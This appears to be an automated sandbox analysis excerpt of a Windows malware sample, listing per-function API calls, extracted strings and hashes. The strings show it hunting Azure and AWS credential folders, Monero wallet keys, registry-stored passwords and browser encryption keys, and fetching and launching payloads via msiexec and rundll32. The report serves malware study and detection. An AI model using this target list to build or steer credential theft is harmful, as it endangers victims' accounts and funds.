                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: e6125fe4d84866b7554f65c75da3f878d4b73b30a22c691c2a092826d28d9636
                                  • Instruction ID: 6bff9e7d292eddcf423c4c69da93989eb012ec7ecf698d5f4910bfc002b5a774
                                  • Opcode Fuzzy Hash: e6125fe4d84866b7554f65c75da3f878d4b73b30a22c691c2a092826d28d9636
                                  • Instruction Fuzzy Hash: D441B2BA940304A7CB60E770EC47FED3378AB20741F045994B685720C1EEB95BC98B92
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E5906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: bfd6c55c803ed5251934a173e23f9428942871eb8e170490bef51778c26e4e3f
                                  • Instruction ID: 3c0e07e46f0b4b2d32f3e5bbef196469ba39ef9ff3865c9721c965033534e0ef
                                  • Opcode Fuzzy Hash: bfd6c55c803ed5251934a173e23f9428942871eb8e170490bef51778c26e4e3f
                                  • Instruction Fuzzy Hash: E471FE75A10208EBDB14EFE4D989FEEB7B8BF48301F108509F556A7284DB39A945CB60
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E531C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E5335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E534EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: c938edffce1618d7a6f6e6f52252a91ebbd2c7c8846bd0f958ae53303ca8136a
                                  • Instruction ID: 7da9edbf314ecce508b74726ef7adba9b63aaffc2d03e80872f503ade45d4541
                                  • Opcode Fuzzy Hash: c938edffce1618d7a6f6e6f52252a91ebbd2c7c8846bd0f958ae53303ca8136a
                                  • Instruction Fuzzy Hash: 021231728001189ADB19EFA0DC96FDEB7B8AF54301F445A69F90676091EF342B4ECF61
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E46280: InternetOpenA.WININET(00E60DFE,00000001,00000000,00000000,00000000), ref: 00E462E1
                                    • Part of subcall function 00E46280: StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E46303
                                    • Part of subcall function 00E46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46335
                                    • Part of subcall function 00E46280: HttpOpenRequestA.WININET(00000000,GET,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E46385
                                    • Part of subcall function 00E46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E463BF
                                    • Part of subcall function 00E46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E463D1
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55318
                                  • lstrlen.KERNEL32(00000000), ref: 00E5532F
                                    • Part of subcall function 00E58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00E55364
                                  • lstrlen.KERNEL32(00000000), ref: 00E55383
                                  • lstrlen.KERNEL32(00000000), ref: 00E553AE
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: c5e3001d385279a5d80e372a9218c951f5b689c456f5dd905dc24330845a2a0d
                                  • Instruction ID: 37bda476b6bbb6649a3f65d75fbea4b0bafd65fd63f7be0597e4d4288b7e7732
                                  • Opcode Fuzzy Hash: c5e3001d385279a5d80e372a9218c951f5b689c456f5dd905dc24330845a2a0d
                                  • Instruction Fuzzy Hash: A7510E319101489BCB18FF60DD96AED77B9BF10302F546928FC067A592EF346B49CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 8d8790e2fb53a154684965a87a09311d9be8cd8c061128d01b85316f4ec205e2
                                  • Instruction ID: b1519440a2c4cabe6d2da143ad83561e45ba99ce32e613c59debc0276f75f7f9
                                  • Opcode Fuzzy Hash: 8d8790e2fb53a154684965a87a09311d9be8cd8c061128d01b85316f4ec205e2
                                  • Instruction Fuzzy Hash: 76C1C5B59002189BCB14EF60DC89FEE73B8BB54305F0459D9F90A77142EB74AA89CF91
                                  APIs
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E542EC
                                  • lstrcat.KERNEL32(?,01CBED50), ref: 00E5430B
                                  • lstrcat.KERNEL32(?,?), ref: 00E5431F
                                  • lstrcat.KERNEL32(?,01CBDC68), ref: 00E54333
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E58D90: GetFileAttributesA.KERNEL32(00000000,?,00E41B54,?,?,00E6564C,?,?,00E60E1F), ref: 00E58D9F
                                    • Part of subcall function 00E49CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E49D39
                                    • Part of subcall function 00E499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
                                    • Part of subcall function 00E499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                    • Part of subcall function 00E499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                    • Part of subcall function 00E499C0: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                    • Part of subcall function 00E499C0: LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                    • Part of subcall function 00E499C0: CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                    • Part of subcall function 00E593C0: GlobalAlloc.KERNEL32(00000000,00E543DD,00E543DD), ref: 00E593D3
                                  • StrStrA.SHLWAPI(?,01CBED20), ref: 00E543F3
                                  • GlobalFree.KERNEL32(?), ref: 00E54512
                                    • Part of subcall function 00E49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49AEF
                                    • Part of subcall function 00E49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E44EEE,00000000,?), ref: 00E49B01
                                    • Part of subcall function 00E49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49B2A
                                    • Part of subcall function 00E49AC0: LocalFree.KERNEL32(?,?,?,?,00E44EEE,00000000,?), ref: 00E49B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E544A3
                                  • StrCmpCA.SHLWAPI(?,00E608D1), ref: 00E544C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E544D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00E544E5
                                  • lstrcat.KERNEL32(00000000,00E60FB8), ref: 00E544F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 9affea4f006c7321b2f72baef4ed8744897edc453b16f4a1d2455974a1366560
                                  • Instruction ID: e3a01573b0579ed2308afb9f555439575a945da12bdafdc92f66f18404f9a725
                                  • Opcode Fuzzy Hash: 9affea4f006c7321b2f72baef4ed8744897edc453b16f4a1d2455974a1366560
                                  • Instruction Fuzzy Hash: 7A7179B6910208A7CB14EBB0DC85FEE73B9AB48301F045599F645B7181EA35DB49CF61
                                  APIs
                                    • Part of subcall function 00E412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E412B4
                                    • Part of subcall function 00E412A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E412BB
                                    • Part of subcall function 00E412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E412D7
                                    • Part of subcall function 00E412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E412F5
                                    • Part of subcall function 00E412A0: RegCloseKey.ADVAPI32(?), ref: 00E412FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4134F
                                  • lstrlen.KERNEL32(?), ref: 00E4135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00E41377
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E41465
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
                                    • Part of subcall function 00E499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                    • Part of subcall function 00E499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                    • Part of subcall function 00E499C0: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                    • Part of subcall function 00E499C0: LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                    • Part of subcall function 00E499C0: CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E414EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 8653daa22658caacdb6ecba505ee040c3f1f1dc2c7d19b35d79d730d614dad6b
                                  • Instruction ID: fdc043557b6c84d6142c84be06d3c8f7c5903a787aae77b200db0e53d66c7851
                                  • Opcode Fuzzy Hash: 8653daa22658caacdb6ecba505ee040c3f1f1dc2c7d19b35d79d730d614dad6b
                                  • Instruction Fuzzy Hash: 285185B2D5011897CB15FB60DC96FED73BCAF54301F4456E8B60A72082EE346B89CBA5
                                  APIs
                                    • Part of subcall function 00E472D0: memset.MSVCRT ref: 00E47314
                                    • Part of subcall function 00E472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E4733A
                                    • Part of subcall function 00E472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E473B1
                                    • Part of subcall function 00E472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E4740D
                                    • Part of subcall function 00E472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00E47452
                                    • Part of subcall function 00E472D0: HeapFree.KERNEL32(00000000), ref: 00E47459
                                  • lstrcat.KERNEL32(00000000,00E617FC), ref: 00E47606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E47648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00E4765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E4768F
                                  • lstrcat.KERNEL32(00000000,00E61804), ref: 00E476A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E476D3
                                  • lstrcat.KERNEL32(00000000,00E61808), ref: 00E476ED
                                  • task.LIBCPMTD ref: 00E476FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 4c0ccf9d674edcbf0786bc22dc5ec5b6a666e20008b70abe15ed292d6334d27b
                                  • Instruction ID: d04fc82cd47a28be208c7d8af9916ba00103d4645146596f7587ba9b17b99319
                                  • Opcode Fuzzy Hash: 4c0ccf9d674edcbf0786bc22dc5ec5b6a666e20008b70abe15ed292d6334d27b
                                  • Instruction Fuzzy Hash: CC315E72A04109DFCB18EBB4EC85DFE73B5BB58301F205159F182B7685DB39A946CBA0
                                  APIs
                                  • memset.MSVCRT ref: 00E47314
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E4733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E473B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E4740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00E47452
                                  • HeapFree.KERNEL32(00000000), ref: 00E47459
                                  • task.LIBCPMTD ref: 00E47555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: Password
                                  • API String ID: 2808661185-3434357891
                                  • Opcode ID: dbe792696b0a2d34276538320fe9763bc055f9a9182043f23bc090d45cbdcaee
                                  • Instruction ID: 2830f007a2674ce04edd878dd3a985c4bb659214a106a30219460febc49d2b13
                                  • Opcode Fuzzy Hash: dbe792696b0a2d34276538320fe9763bc055f9a9182043f23bc090d45cbdcaee
                                  • Instruction Fuzzy Hash: 93613CB5D141689BDB24DB50EC41BEEB7B8BF44304F0091E9E689B6141DBB45BC9CFA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01CBEAB0,00000000,?,00E60E2C,00000000,?,00000000), ref: 00E58130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E58137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E58158
                                  • __aulldiv.LIBCMT ref: 00E58172
                                  • __aulldiv.LIBCMT ref: 00E58180
                                  • wsprintfA.USER32 ref: 00E581AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
